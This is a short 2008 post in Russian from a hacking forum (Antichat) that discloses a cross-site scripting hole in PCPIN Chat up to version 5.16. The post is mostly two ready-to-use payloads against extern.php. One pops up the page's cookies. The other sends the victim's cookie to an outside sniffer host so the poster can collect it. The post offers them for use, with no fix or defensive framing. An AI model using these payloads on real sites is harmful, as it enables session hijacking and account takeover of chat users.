07.04.2008, 18:56
|
|
Leaders of Antichat - Level 4
Регистрация: 02.06.2005
Сообщений: 1,411
Провел на форуме:
10605912
Репутация:
4693
|
|
PCPIN chat
Не нашёл открытой темы, куда можно постить уязвимости движков, в общем вот, нашёл почти год назад, не помню, почему так извращался.
Type:[XSS]
Product: PCPIN Chat <= 5.16
Код:
http://sitename/chat/extern.php?ext=javascript:alert(document.cookie)
Ну, а на сниффер слал так, наверное можно и проще, сейчас лень было переписывать:
Код:
extern.php?ext=javascript:navigate('http:'.concat('//sniffer.xx?',document.cookie))
__________________
Я отдал бы немало за пару крыльев,
Я отдал бы немало за третий глаз
За руку на которой четырнадцать пальцев
Мне нужен для дыхания другой газ..
Мой блог: http://qwazar.ru/.
|
|
|